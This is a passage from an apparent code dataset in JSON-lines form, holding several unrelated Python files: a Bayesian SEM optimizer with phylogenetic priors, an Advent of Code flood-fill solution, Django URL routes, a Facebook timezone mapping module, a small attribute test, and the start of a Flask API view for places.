self.log_likelihood(params_opt, node_name) + \\\n self.log_prior_beta(params_opt, node_name)\n for node_name2, dist in self.tree[node_name].dist:\n prob_beta += self.log_edge(node_name, node_name2, dist, params_opt)\n return prob_beta\n\n\n def log_post_lambda(self, params_opt, node_name):\n prob_lambda = self.log_likelihood(params_opt, node_name) + \\\n self.log_prior_lambda(params_opt, node_name)\n for node_name2, dist in self.tree[node_name].dist:\n prob_lambda += self.log_edge(node_name, node_name2, dist, params_opt)\n return prob_lambda\n\n\n def log_post_theta(self, params_opt, *args):\n prob_theta = 
self.log_prior_theta(params_opt)\n prob_theta += sum(map(lambda x: self.log_likelihood(params_opt, x),\n self.tree.keys()))\n return prob_theta\n\n\n def log_post_psi(self, params_opt, *args):\n prob_psi = self.log_prior_psi(params_opt)\n prob_psi += sum(map(lambda x: self.log_likelihood(params_opt, x),\n self.tree.keys()))\n return prob_psi\n\n\n def log_post_cov(self, params_opt, node_name):\n prob_cov = self.log_likelihood(params_opt, node_name)\n for node_name2, dist in self.tree[node_name].dist:\n prob_cov += self.log_edge(node_name, node_name2, dist, params_opt)\n return prob_cov\n\n\n def log_post_tree(self, params_opt, *args):\n prob_tree = self.log_prior_tree(params_opt)\n # print('prob_tree', prob_tree)\n for node_name, edges in self.tree.items():\n if len(edges.dist) == 2: # If root\n continue\n edge = edges.dist[0]\n node_name2, dist = edge\n # print(node_name, node_name2, dist)\n # print('prob_tree', prob_tree)\n prob_tree += self.log_edge(node_name, node_name2, dist, params_opt)\n # print('prob_tree', prob_tree)\n return prob_tree\n\n\n def get_params(self, tree: SEMTree, mod_node: SEMModelNode):\n\n # Common Theta and Psi matrices\n node_names = tree.nodes.keys()\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Psi', 'Theta'}:\n continue\n for name in node_names:\n # Add new params\n self.param_pos += [Parameter(node_name=name,\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # Outside of the loop\n # Single parameter for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n # Lambda and Beta matrices\n node_names = tree.nodes.keys()\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Lambda', 'Beta'}:\n continue\n for name in node_names:\n # Add new param\n self.param_pos += [Parameter(node_name=name,\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # WITHIN the loop\n # Separate parameters for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n # Covariance Matrices with parameters\n node_names = [name for name, node in tree.nodes.items() if node.type == 'node']\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Cov'}:\n continue\n for name in node_names:\n # Add new params\n self.param_pos += [Parameter(node_name=name,\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # WITHIN the loop\n # Separate parameters for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n # Parameters of a tree-process - the same for each node\n # Cov, Beta and Lambda matrices\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Lambda', 'Beta', 'Cov'}:\n continue\n\n # Add new param\n self.param_pos += [Parameter(node_name='Tree',\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # Outside the loop\n # Separate parameters for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n self.param_val = np.zeros(self.n_params)\n\n\n def set_params(self, mod_node: SEMModelNode, dataset: List[SEMData]):\n \"\"\"\n\n :param mod_node:\n :param dataset:\n :return:\n \"\"\"\n # Beta and Lambda Parameters start from zero values\n\n data_id = 0\n mod_node.load_initial_dataset(dataset[data_id])\n\n for pos in self.param_pos:\n # Only Psi, Theta and Cov parameters\n\n if pos.node_name == 'Tree':\n self.param_val[pos.id_opt] = 1\n continue\n if pos.mx_type in {'Beta', 'Lambda'}:\n continue\n 
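# Remaining positions are Psi, Theta and Cov cells: seed them with the\n # starting values that load_initial_dataset() estimated above.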
self.param_val[pos.id_opt] = mod_node.param_val[pos.id_mod]\n\n\n def log_prior_psi(self, params_opt, *args):\n \"\"\" Inverse Wishart distribution of r0 and rho0\"\"\"\n\n rand_node_name = list(self.tree.keys())[0]\n params_node = self.get_node_params(params_opt, rand_node_name)\n ms_psi = self.get_matrices(params_node, 'Psi')\n prob_psi = invwishart.logpdf(ms_psi, self.p_psi_df, self.p_psi_cov)\n return prob_psi\n\n\n def log_prior_beta(self, params_opt, node_name):\n \"\"\" Normal \"\"\"\n params_node = self.get_node_params(params_opt, node_name)\n ms_psi = self.get_matrices(params_node, 'Psi')\n prob_beta = 0\n for pos in self.param_pos:\n if pos.mx_type != 'Beta' or pos.node_name != node_name:\n continue\n prob_beta += norm.logpdf(params_opt[pos.id_opt],\n self.p_beta_mean,\n self.p_beta_cov * ms_psi[pos.id_mod,\n pos.id_mod])\n return prob_beta\n\n\n def log_prior_theta(self, params_opt):\n \"\"\" Inverse Gamma distribution of r0 and rho0\"\"\"\n # As this parameter is the same through all of the nodes,\n # let's take theta from the Theta parameters of a random node\n rand_node_name = list(self.tree.keys())[0]\n params_theta = [params_opt[pos.id_opt] for pos in self.param_pos\n if pos.mx_type == 'Theta' and pos.node_name == rand_node_name]\n invgamma_theta = partial(invgamma.logpdf,\n a=self.p_theta_alpha,\n scale=self.p_theta_beta)\n prob_theta = reduce(lambda x, y: x+y,\n map(invgamma_theta, params_theta))\n return prob_theta\n\n\n def log_prior_tree(self, params_opt):\n params_tree = [params_opt[p.id_opt] for p in self.param_pos if p.node_name == 'Tree']\n invgamma_tree = partial(invgamma.logpdf,\n a=self.p_tree_alpha,\n scale=self.p_tree_beta)\n\n prob_tree = reduce(lambda x, y: x+y,\n map(invgamma_tree, params_tree))\n return prob_tree\n\n\n def log_prior_lambda(self, params_opt, node_name):\n \"\"\" Normal \"\"\"\n params_node = self.get_node_params(params_opt, node_name)\n ms_theta = self.get_matrices(params_node, 'Theta')\n prob_lambda = 0\n for pos in self.param_pos:\n if pos.mx_type != 'Lambda' or pos.node_name != node_name:\n continue\n prob_lambda += norm.logpdf(params_opt[pos.id_opt],\n self.p_lambda_mean,\n self.p_lambda_cov * ms_theta[pos.id_mod,\n pos.id_mod])\n return prob_lambda\n\n\n def prior_params_psi(self):\n \"\"\"\n\n :return:\n \"\"\"\n # for Psi matrix\n\n # Mean value of all Psi matrices\n m_psi = reduce(lambda x, y: x+y,\n [self.get_matrices(params, 'Psi')\n for _, params in self.param_leaf.items()])\n m_psi = m_psi / len(self.param_leaf)\n\n # Dimension of psi matrix\n psi_dim = m_psi.shape[0]\n # Total number of all samples is a degree of freedom\n p_psi_df = sum([p.shape[0] for _, p in self.m_profiles.items()])\n p_psi_cov = m_psi * (p_psi_df - psi_dim - 1)\n return p_psi_df, p_psi_cov\n\n\n def prior_params_coefs(self, mx_type):\n \"\"\"\n Parameters of the prior distribution of params of Beta or Lambda\n :return: mean and variance of Parameters\n \"\"\"\n coef_init = []\n for pos in self.param_pos:\n for _, param in self.param_leaf.items():\n if pos.node_name != 'Tree' and pos.mx_type == mx_type:\n coef_init += [param[pos.id_mod]]\n\n if not coef_init:\n coef_init = 0\n coef_mean = np.mean(coef_init)\n coef_var = np.var(coef_init) + 1\n return coef_mean, coef_var\n\n\n def prior_params_theta(self):\n \"\"\"\n\n :return:\n \"\"\"\n\n theta_init = []\n for pos in self.param_pos:\n for _, param in self.param_leaf.items():\n if pos.node_name != 'Tree' and pos.mx_type == 'Theta':\n theta_init += [param[pos.id_mod]]\n\n if not theta_init:\n theta_init = 0\n\n # 
Total number of all samples is a degree of freedom\n df = sum([p.shape[0] for _, p in self.m_profiles.items()])\n p_theta_alpha = df/2\n p_theta_beta = np.median(theta_init) * (p_theta_alpha - 1)\n return p_theta_alpha, p_theta_beta\n\n\n def prior_params_tree(self):\n \"\"\"\n Parameters of a prior distribution of phylogenetic Wiener process\n Parameter Sigma of a Wiener process is prior distributed by inv-gamma\n :return:\n \"\"\"\n id = {name:i for i, name in enumerate(list(self.tree.keys()))}\n n_nodes = len(id)\n dist_mx = np.zeros((n_nodes, n_nodes))\n\n for node1, edges in self.tree.items():\n for node2, dist in edges.dist:\n dist_mx[id[node1], id[node2]] = dist\n dist_mx[id[node2], id[node1]] = dist\n\n # while np.count_nonzero(dist_mx) < (n_nodes ** 2 - n_nodes):\n for _ in range(20):\n for i, j in combinations(range(n_nodes), 2):\n if dist_mx[i,j] > 0:\n continue\n row_i = dist_mx[i]\n row_j = dist_mx[j]\n value = (row_i + row_j) * (row_i > 0) * (row_j > 0)\n dist_mx[i, j] = dist_mx[j, i] = - max(np.unique(value))\n dist_mx = np.abs(dist_mx)\n\n evolve_rate = []\n for node1, node2 in combinations(self.m_cov.keys(), 2):\n mx_cov_dist = np.abs(self.m_cov[node1] - self.m_cov[node2])\n elements = mx_cov_dist[np.triu_indices(len(mx_cov_dist))]\n norm_elements = elements / dist_mx[id[node2], id[node1]]\n evolve_rate += list(norm_elements)\n\n\n\n df = np.mean([p.shape[0] for _, p in self.m_profiles.items()])\n p_theta_alpha = df/2\n # p_theta_alpha = 4\n p_theta_beta = np.percentile(evolve_rate, 75) * (p_theta_alpha - 1)\n # print(p_theta_alpha, p_theta_beta)\n return p_theta_alpha, p_theta_beta\n\n\n def constraint_theta(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n ms_theta = self.get_matrices(params_node, 'Theta')\n return sum(ms_theta.diagonal() >= 0) - ms_theta.shape[0]\n\n\n def constraint_psi(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n ms_psi = self.get_matrices(params_node, 'Psi')\n # return np.linalg.det(ms['Psi']) - 1e-6\n return sum(np.linalg.eig(ms_psi)[0] > 0) - ms_psi.shape[0]\n\n\n def constraint_sigma(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n m_sigma = self.calculate_sigma(params_node)\n # return np.linalg.det(m_sigma) - 1e-6\n return sum(np.linalg.eig(m_sigma)[0] > 0) - m_sigma.shape[0]\n\n\n def constraint_cov(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n m_cov = self.get_matrices(params_node, 'Cov')\n # return np.linalg.det(m_sigma) - 1e-6\n return sum(np.linalg.eig(m_cov)[0] > 0) - m_cov.shape[0]\n\n\n def constraint_tree(self, params_opt, node_name):\n params_tree = [params_opt[p.id_opt] > 0 for p in self.param_pos\n if p.node_name == node_name]\n return sum(params_tree) - len(params_tree)\n\n\n def calculate_sigma(self, params):\n \"\"\"\n Sigma matrix calculated from the model\n \"\"\"\n ms = self.get_matrices(params)\n m_beta = ms['Beta']\n m_lambda = ms['Lambda']\n m_psi = ms['Psi']\n m_theta = ms['Theta']\n\n m_c = np.linalg.pinv(np.identity(m_beta.shape[0]) - m_beta)\n return m_lambda @ m_c @ m_psi @ m_c.T @ m_lambda.T + m_theta\n\n\n\n","sub_path":"sem_opt_phylo.py","file_name":"sem_opt_phylo.py","file_ext":"py","file_size_in_byte":30173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"373803483","text":"from knothash import KnotHash\n\ndef floodFill(coordinate, groupNumber):\n global coordsToGroup\n global grid\n\n 
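# Recursive 4-connected flood fill: claim an unvisited, in-bounds, used\n # cell for the current group, then recurse into the four orthogonal\n # neighbours so every cell of a connected region shares one group number.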
if coordinate not in coordsToGroup:\n x, y = coordinate\n if x >= 0 and x < len(grid) and y >= 0 and y < len(grid):\n cellState = grid[x][y]\n\n if cellState:\n coordsToGroup[coordinate] = groupNumber\n\n floodFill((x-1, y), groupNumber) # north\n floodFill((x+1, y), groupNumber) # south\n floodFill((x, y+1), groupNumber) # east\n floodFill((x, y-1), groupNumber) # west\n\ninputStr = \"\"\nwith open(\"input.txt\", \"r\") as inputFile:\n inputStr = inputFile.readline().strip()\n\ndimension = 128\nknothash = KnotHash()\ngrid = []\nusedSquares = 0\nfor row in range(dimension):\n currentKnotHashInput = inputStr + \"-\" + str(row)\n \n currentKnotHash = knothash.generateHash(currentKnotHashInput)\n decimalKnotHash = int(currentKnotHash, 16)\n rawBinaryKnotHash = bin(decimalKnotHash)\n binaryKnotHashNo0 = rawBinaryKnotHash[2:]\n binaryKnotHash = \"0\" * (dimension - len(binaryKnotHashNo0)) + binaryKnotHashNo0\n\n\n gridRow = []\n for digit in str(binaryKnotHash):\n gridRow.append(digit == \"1\")\n usedSquares += 1 if digit == \"1\" else 0\n\n grid.append(gridRow)\n\nprint(\"Number of used squares: {}\".format(usedSquares))\n\ncoordsToGroup = {}\ngroupNumber = 0\nfor rowIndex, row in enumerate(grid):\n for colIndex, col in enumerate(row):\n coordinate = (rowIndex, colIndex)\n\n if col and coordinate not in coordsToGroup:\n floodFill(coordinate, groupNumber)\n groupNumber += 1\n\nprint(\"Number of groups: {}\".format(groupNumber))","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133644718","text":"from django.conf.urls import url, include\nfrom .views import (login_view, signup_view, settings_view, logout_view)\n\n\nurlpatterns = [\n url(r'^$',login_view,name='login'),\n url(r'^logout$',logout_view,name='logout'),\n #url(r'^login$',login_view,name='login'),\n url(r'^signup$',signup_view,name='signup'),\n url(r'^settings$',settings_view,name='settings'),\n]\n\n#pip install bcrypt\n#pip install django[argon2]\n","sub_path":"src/webapp/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111088463","text":"'''\nMIT License\n\nCopyright (c) 2018, Selectom.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\n# Based on https://developers.facebook.com/docs/marketing-api/reference/ad-account/timezone-ids/v2.12\n\n# 1 -> TZ_AMERICA_LOS_ANGELES\nfacebookTimezoneIdToTimezoneCode = {\n 0: 'TZ_UNKNOWN',\n 1: 'TZ_AMERICA_LOS_ANGELES',\n 2: 'TZ_AMERICA_DENVER',\n 3: 'TZ_PACIFIC_HONOLULU',\n 4: 'TZ_AMERICA_ANCHORAGE',\n 5: 'TZ_AMERICA_PHOENIX',\n 6: 'TZ_AMERICA_CHICAGO',\n 7: 'TZ_AMERICA_NEW_YORK',\n 8: 'TZ_ASIA_DUBAI',\n 9: 'TZ_AMERICA_ARGENTINA_SAN_LUIS',\n 10: 'TZ_AMERICA_ARGENTINA_BUENOS_AIRES',\n 11: 'TZ_AMERICA_ARGENTINA_SALTA',\n 12: 'TZ_EUROPE_VIENNA',\n 13: 'TZ_AUSTRALIA_PERTH',\n 14: 'TZ_AUSTRALIA_BROKEN_HILL',\n 15: 'TZ_AUSTRALIA_SYDNEY',\n 16: 'TZ_EUROPE_SARAJEVO',\n 17: 'TZ_ASIA_DHAKA',\n 18: 'TZ_EUROPE_BRUSSELS',\n 19: 'TZ_EUROPE_SOFIA',\n 20: 'TZ_ASIA_BAHRAIN',\n 21: 'TZ_AMERICA_LA_PAZ',\n 22: 'TZ_AMERICA_NORONHA',\n 23: 'TZ_AMERICA_CAMPO_GRANDE',\n 24: 'TZ_AMERICA_BELEM',\n 25: 'TZ_AMERICA_SAO_PAULO',\n 26: 'TZ_AMERICA_NASSAU',\n 27: 'TZ_AMERICA_DAWSON',\n 28: 'TZ_AMERICA_VANCOUVER',\n 29: 'TZ_AMERICA_DAWSON_CREEK',\n 30: 'TZ_AMERICA_EDMONTON',\n 31: 'TZ_AMERICA_RAINY_RIVER',\n 32: 'TZ_AMERICA_REGINA',\n 33: 'TZ_AMERICA_ATIKOKAN',\n 34: 'TZ_AMERICA_IQALUIT',\n 35: 'TZ_AMERICA_TORONTO',\n 36: 'TZ_AMERICA_BLANC_SABLON',\n 37: 'TZ_AMERICA_HALIFAX',\n 38: 'TZ_AMERICA_ST_JOHNS',\n 39: 'TZ_EUROPE_ZURICH',\n 40: 'TZ_PACIFIC_EASTER',\n 41: 'TZ_AMERICA_SANTIAGO',\n 42: 'TZ_ASIA_SHANGHAI',\n 43: 'TZ_AMERICA_BOGOTA',\n 44: 'TZ_AMERICA_COSTA_RICA',\n 45: 'TZ_ASIA_NICOSIA',\n 46: 'TZ_EUROPE_PRAGUE',\n 47: 'TZ_EUROPE_BERLIN',\n 48: 'TZ_EUROPE_COPENHAGEN',\n 49: 'TZ_AMERICA_SANTO_DOMINGO',\n 50: 'TZ_PACIFIC_GALAPAGOS',\n 51: 'TZ_AMERICA_GUAYAQUIL',\n 52: 'TZ_EUROPE_TALLINN',\n 53: 'TZ_AFRICA_CAIRO',\n 54: 'TZ_ATLANTIC_CANARY',\n 55: 'TZ_EUROPE_MADRID',\n 56: 'TZ_EUROPE_HELSINKI',\n 57: 'TZ_EUROPE_PARIS',\n 58: 'TZ_EUROPE_LONDON',\n 59: 'TZ_AFRICA_ACCRA',\n 60: 'TZ_EUROPE_ATHENS',\n 61: 'TZ_AMERICA_GUATEMALA',\n 62: 'TZ_ASIA_HONG_KONG',\n 63: 'TZ_AMERICA_TEGUCIGALPA',\n 64: 'TZ_EUROPE_ZAGREB',\n 65: 'TZ_EUROPE_BUDAPEST',\n 66: 'TZ_ASIA_JAKARTA',\n 67: 'TZ_ASIA_MAKASSAR',\n 68: 'TZ_ASIA_JAYAPURA',\n 69: 'TZ_EUROPE_DUBLIN',\n 70: 'TZ_ASIA_JERUSALEM',\n 71: 'TZ_ASIA_KOLKATA',\n 72: 'TZ_ASIA_BAGHDAD',\n 73: 'TZ_ATLANTIC_REYKJAVIK',\n 74: 'TZ_EUROPE_ROME',\n 75: 'TZ_AMERICA_JAMAICA',\n 76: 'TZ_ASIA_AMMAN',\n 77: 'TZ_ASIA_TOKYO',\n 78: 'TZ_AFRICA_NAIROBI',\n 79: 'TZ_ASIA_SEOUL',\n 80: 'TZ_ASIA_KUWAIT',\n 81: 'TZ_ASIA_BEIRUT',\n 82: 'TZ_ASIA_COLOMBO',\n 83: 'TZ_EUROPE_VILNIUS',\n 84: 'TZ_EUROPE_LUXEMBOURG',\n 85: 'TZ_EUROPE_RIGA',\n 86: 'TZ_AFRICA_CASABLANCA',\n 87: 'TZ_EUROPE_SKOPJE',\n 88: 'TZ_EUROPE_MALTA',\n 89: 'TZ_INDIAN_MAURITIUS',\n 90: 'TZ_INDIAN_MALDIVES',\n 91: 'TZ_AMERICA_TIJUANA',\n 92: 'TZ_AMERICA_HERMOSILLO',\n 93: 'TZ_AMERICA_MAZATLAN',\n 94: 'TZ_AMERICA_MEXICO_CITY',\n 95: 'TZ_ASIA_KUALA_LUMPUR',\n 96: 'TZ_AFRICA_LAGOS',\n 97: 'TZ_AMERICA_MANAGUA',\n 98: 'TZ_EUROPE_AMSTERDAM',\n 99: 'TZ_EUROPE_OSLO',\n 100: 'TZ_PACIFIC_AUCKLAND',\n 101: 'TZ_ASIA_MUSCAT',\n 102: 'TZ_AMERICA_PANAMA',\n 103: 'TZ_AMERICA_LIMA',\n 104: 'TZ_ASIA_MANILA',\n 105: 'TZ_ASIA_KARACHI',\n 106: 'TZ_EUROPE_WARSAW',\n 107: 'TZ_AMERICA_PUERTO_RICO',\n 108: 'TZ_ASIA_GAZA',\n 109: 'TZ_ATLANTIC_AZORES',\n 110: 'TZ_EUROPE_LISBON',\n 111: 'TZ_AMERICA_ASUNCION',\n 
112: 'TZ_ASIA_QATAR',\n 113: 'TZ_EUROPE_BUCHAREST',\n 114: 'TZ_EUROPE_BELGRADE',\n 115: 'TZ_EUROPE_KALININGRAD',\n 116: 'TZ_EUROPE_MOSCOW',\n 117: 'TZ_EUROPE_SAMARA',\n 118: 'TZ_ASIA_YEKATERINBURG',\n 119: 'TZ_ASIA_OMSK',\n 120: 'TZ_ASIA_KRASNOYARSK',\n 121: 'TZ_ASIA_IRKUTSK',\n 122: 'TZ_ASIA_YAKUTSK',\n 123: 'TZ_ASIA_VLADIVOSTOK',\n 124: 'TZ_ASIA_MAGADAN',\n 125: 'TZ_ASIA_KAMCHATKA',\n 126: 'TZ_ASIA_RIYADH',\n 127: 'TZ_EUROPE_STOCKHOLM',\n 128: 'TZ_ASIA_SINGAPORE',\n 129: 'TZ_EUROPE_LJUBLJANA',\n 130: 'TZ_EUROPE_BRATISLAVA',\n 131: 'TZ_AMERICA_EL_SALVADOR',\n 132: 'TZ_ASIA_BANGKOK',\n 133: 'TZ_AFRICA_TUNIS',\n 134: 'TZ_EUROPE_ISTANBUL',\n 135: 'TZ_AMERICA_PORT_OF_SPAIN',\n 136: 'TZ_ASIA_TAIPEI',\n 137: 'TZ_EUROPE_KIEV',\n 138: 'TZ_AMERICA_MONTEVIDEO',\n 139: 'TZ_AMERICA_CARACAS',\n 140: 'TZ_ASIA_HO_CHI_MINH',\n 141: 'TZ_AFRICA_JOHANNESBURG',\n 142: 'TZ_NUM_TIMEZONES'\n}\n# TZ_AMERICA_LOS_ANGELES -> 1\nfacebookTimezoneCodeToTimezoneId = {v: k for k, v in list(facebookTimezoneIdToTimezoneCode.items())}\n\n# 1 -> TZ_AMERICA_LOS_ANGELES\nfacebookTimezoneIdToTimezoneName = {\n 0: 'Unknown',\n 1: 'America/Los_Angeles',\n 2: 'America/Denver',\n 3: 'Pacific/Honolulu',\n 4: 'America/Anchorage',\n 5: 'America/Phoenix',\n 6: 'America/Chicago',\n 7: 'America/New_York',\n 8: 'Asia/Dubai',\n 9: 'America/Argentina/San_Luis',\n 10: 'America/Argentina/Buenos_Aires',\n 11: 'America/Argentina/Salta',\n 12: 'Europe/Vienna',\n 13: 'Australia/Perth',\n 14: 'Australia/Broken_Hill',\n 15: 'Australia/Sydney',\n 16: 'Europe/Sarajevo',\n 17: 'Asia/Dhaka',\n 18: 'Europe/Brussels',\n 19: 'Europe/Sofia',\n 20: 'Asia/Bahrain',\n 21: 'America/La_Paz',\n 22: 'America/Noronha',\n 23: 'America/Campo_Grande',\n 24: 'America/Belem',\n 25: 'America/Sao_Paulo',\n 26: 'America/Nassau',\n 27: 'America/Dawson',\n 28: 'America/Vancouver',\n 29: 'America/Dawson_Creek',\n 30: 'America/Edmonton',\n 31: 'America/Rainy_River',\n 32: 'America/Regina',\n 33: 'America/Atikokan',\n 34: 'America/Iqaluit',\n 35: 'America/Toronto',\n 36: 'America/Blanc-Sablon',\n 37: 'America/Halifax',\n 38: 'America/St_Johns',\n 39: 'Europe/Zurich',\n 40: 'Pacific/Easter',\n 41: 'America/Santiago',\n 42: 'Asia/Shanghai',\n 43: 'America/Bogota',\n 44: 'America/Costa_Rica',\n 45: 'Asia/Nicosia',\n 46: 'Europe/Prague',\n 47: 'Europe/Berlin',\n 48: 'Europe/Copenhagen',\n 49: 'America/Santo_Domingo',\n 50: 'Pacific/Galapagos',\n 51: 'America/Guayaquil',\n 52: 'Europe/Tallinn',\n 53: 'Africa/Cairo',\n 54: 'Atlantic/Canary',\n 55: 'Europe/Madrid',\n 56: 'Europe/Helsinki',\n 57: 'Europe/Paris',\n 58: 'Europe/London',\n 59: 'Africa/Accra',\n 60: 'Europe/Athens',\n 61: 'America/Guatemala',\n 62: 'Asia/Hong_Kong',\n 63: 'America/Tegucigalpa',\n 64: 'Europe/Zagreb',\n 65: 'Europe/Budapest',\n 66: 'Asia/Jakarta',\n 67: 'Asia/Makassar',\n 68: 'Asia/Jayapura',\n 69: 'Europe/Dublin',\n 70: 'Asia/Jerusalem',\n 71: 'Asia/Kolkata',\n 72: 'Asia/Baghdad',\n 73: 'Atlantic/Reykjavik',\n 74: 'Europe/Rome',\n 75: 'America/Jamaica',\n 76: 'Asia/Amman',\n 77: 'Asia/Tokyo',\n 78: 'Africa/Nairobi',\n 79: 'Asia/Seoul',\n 80: 'Asia/Kuwait',\n 81: 'Asia/Beirut',\n 82: 'Asia/Colombo',\n 83: 'Europe/Vilnius',\n 84: 'Europe/Luxembourg',\n 85: 'Europe/Riga',\n 86: 'Africa/Casablanca',\n 87: 'Europe/Skopje',\n 88: 'Europe/Malta',\n 89: 'Indian/Mauritius',\n 90: 'Indian/Maldives',\n 91: 'America/Tijuana',\n 92: 'America/Hermosillo',\n 93: 'America/Mazatlan',\n 94: 'America/Mexico_City',\n 95: 'Asia/Kuala_Lumpur',\n 96: 'Africa/Lagos',\n 97: 'America/Managua',\n 98: 'Europe/Amsterdam',\n 99: 
'Europe/Oslo',\n 100: 'Pacific/Auckland',\n 101: 'Asia/Muscat',\n 102: 'America/Panama',\n 103: 'America/Lima',\n 104: 'Asia/Manila',\n 105: 'Asia/Karachi',\n 106: 'Europe/Warsaw',\n 107: 'America/Puerto_Rico',\n 108: 'Asia/Gaza',\n 109: 'Atlantic/Azores',\n 110: 'Europe/Lisbon',\n 111: 'America/Asuncion',\n 112: 'Asia/Qatar',\n 113: 'Europe/Bucharest',\n 114: 'Europe/Belgrade',\n 115: 'Europe/Kaliningrad',\n 116: 'Europe/Moscow',\n 117: 'Europe/Samara',\n 118: 'Asia/Yekaterinburg',\n 119: 'Asia/Omsk',\n 120: 'Asia/Krasnoyarsk',\n 121: 'Asia/Irkutsk',\n 122: 'Asia/Yakutsk',\n 123: 'Asia/Vladivostok',\n 124: 'Asia/Magadan',\n 125: 'Asia/Kamchatka',\n 126: 'Asia/Riyadh',\n 127: 'Europe/Stockholm',\n 128: 'Asia/Singapore',\n 129: 'Europe/Ljubljana',\n 130: 'Europe/Bratislava',\n 131: 'America/El_Salvador',\n 132: 'Asia/Bangkok',\n 133: 'Africa/Tunis',\n 134: 'Europe/Istanbul',\n 135: 'America/Port_of_Spain',\n 136: 'Asia/Taipei',\n 137: 'Europe/Kiev',\n 138: 'America/Montevideo',\n 139: 'America/Caracas',\n 140: 'Asia/Ho_Chi_Minh',\n 141: 'Africa/Johannesburg',\n 142: 'Num/Timezones'\n}\n# TZ_AMERICA_LOS_ANGELES -> 1\nfacebookTimezoneNameToTimezoneId = {v: k for k, v in list(facebookTimezoneIdToTimezoneName.items())}\n\n# TZ_AMERICA_LOS_ANGELES -> America/Los_Angeles\nfacebookTimezoneCodeToTimezoneName = \\\n {k: facebookTimezoneIdToTimezoneName[v] for (k, v) in list(facebookTimezoneCodeToTimezoneId.items())}\n# America/Los_Angeles -> TZ_AMERICA_LOS_ANGELES\nfacebookTimezoneNameToTimezoneCode = {v: k for k, v in list(facebookTimezoneCodeToTimezoneName.items())}\n\n# 5 -> Etc/GMT+5\ndef timezoneNameFromTimezoneOffset(timezoneOffset):\n '''\n Returns a timezone based on the timezone offset, as returned in the 'timezone' field of:\n https://developers.facebook.com/docs/graph-api/reference/v2.12/user\n\n :param timezoneOffset: Float, -24.0 to 24.0\n :return: timezoneName\n '''\n\n # TODO: Handle 0.25, 0.5 and 0.75 values - these actually exist\n timezoneOffset = round(timezoneOffset)\n\n # unfortunately we need these 2 ifs, because pytz doesn't support +13 adn +14 timezones\n if timezoneOffset == 13:\n return 'Pacific/Auckland'\n elif timezoneOffset == 14:\n return 'Pacific/Kiritimati'\n elif timezoneOffset > 0:\n return 'Etc/GMT+%d' % timezoneOffset\n elif timezoneOffset == 0:\n return 'Etc/GMT'\n else:\n return 'Etc/GMT%d' % timezoneOffset","sub_path":"facebook_timezones/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"397212181","text":"#!/usr/bin/python\n\n# Copyright (c) 2012 Lars Hupfeldt Nielsen, Hupfeldt IT\n# All rights reserved. 
 +{"seq_id":"397212181","text":"#!/usr/bin/python\n\n# Copyright (c) 2012 Lars Hupfeldt Nielsen, Hupfeldt IT\n# All rights reserved. This work is under a BSD license, see LICENSE.TXT.\n\nfrom ..attribute import Attribute\n\n\ndef test_attribute_repr():\n class Container(object):\n attributes = {}\n ac = Attribute(attribute_name='some_name1')\n assert repr(ac) == \"Attribute: 'some_name1':not-frozen, values: {}\"\n ac._mc_frozen = True\n assert repr(ac) == \"Attribute: 'some_name1':frozen, values: {}\"\n","sub_path":"test/attribute_test.py","file_name":"attribute_test.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"237352542","text":"#!/usr/bin/python3\n\"\"\"Module that handles all default RestFul API actions for places\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models.place import Place\nfrom models.city import City\nfrom models.user import User\nfrom models import storage\n\n\n@app_views.route('/cities/<city_id>/places', methods=['GET'],\n strict_slashes=False)\ndef get_places(city_id):\n \"\"\"Returns a list of all the places\"\"\"\n city = storage.get(\"City\", city_id)\n if city is None:\n abort(404)\n place_list = []\n for place in city.places:\n place_dict = 